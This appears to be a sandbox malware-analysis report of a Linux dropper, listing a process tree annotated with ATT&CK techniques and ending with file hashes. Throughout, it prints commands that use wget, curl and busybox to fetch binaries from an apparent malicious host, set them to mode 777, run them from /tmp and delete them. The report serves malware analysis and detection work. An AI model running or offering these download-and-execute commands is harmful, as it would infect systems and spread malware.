/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:985
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97